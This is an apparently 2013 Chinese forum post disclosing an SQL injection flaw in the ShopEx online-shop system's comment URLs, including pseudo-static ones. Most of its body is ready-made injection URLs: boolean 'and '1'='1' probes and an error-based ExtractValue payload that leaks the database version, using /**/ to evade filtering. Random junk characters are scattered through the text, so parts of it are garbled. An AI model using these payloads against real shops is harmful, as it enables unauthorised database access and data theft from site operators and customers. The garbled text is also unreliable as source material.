注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… ; ]" I5 g" T- \* @
# {4 h2 N& S: c3 u3 R" j5 |好吧,我扯远了~~% l* u' \9 s6 ]4 h- n/ n' b) w
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
5 X) r9 m* M9 c& g不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
8 h% A6 J% y- V I: {
0 H: x s' I+ _5 Rhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
9 U' @7 d' ]' Z8 l" E
" n- Q; V8 g8 C0 M/ J; @http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 8 m! x! c* ~5 z5 Q6 I5 ~/ x- n
8 R* v) G- K7 e( q/ Y' \
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
- _ N. U2 N( P; ~; U/ P" v" u+ S9 G
6 Y v9 c" x6 S: V6 ahttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 0 j; ?% Y% Z! n5 s& y& @
( x& c: H) K* H" d$ E
( d, u0 C! B; m$ _) @+ t一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
4 X3 H' I- k% M- j如何注入就不多说了,10多年的东西了…不会也会了…
! S# z% g) f/ i* f6 v6 X& J# r' e
, D$ @0 P. H: D# V9 |
0 \; I# t# K2 y6 I0 F- k) l I9 C$ i/ r/ X
|
发表于 2013-2-19 08:31:27
收藏
支持
反对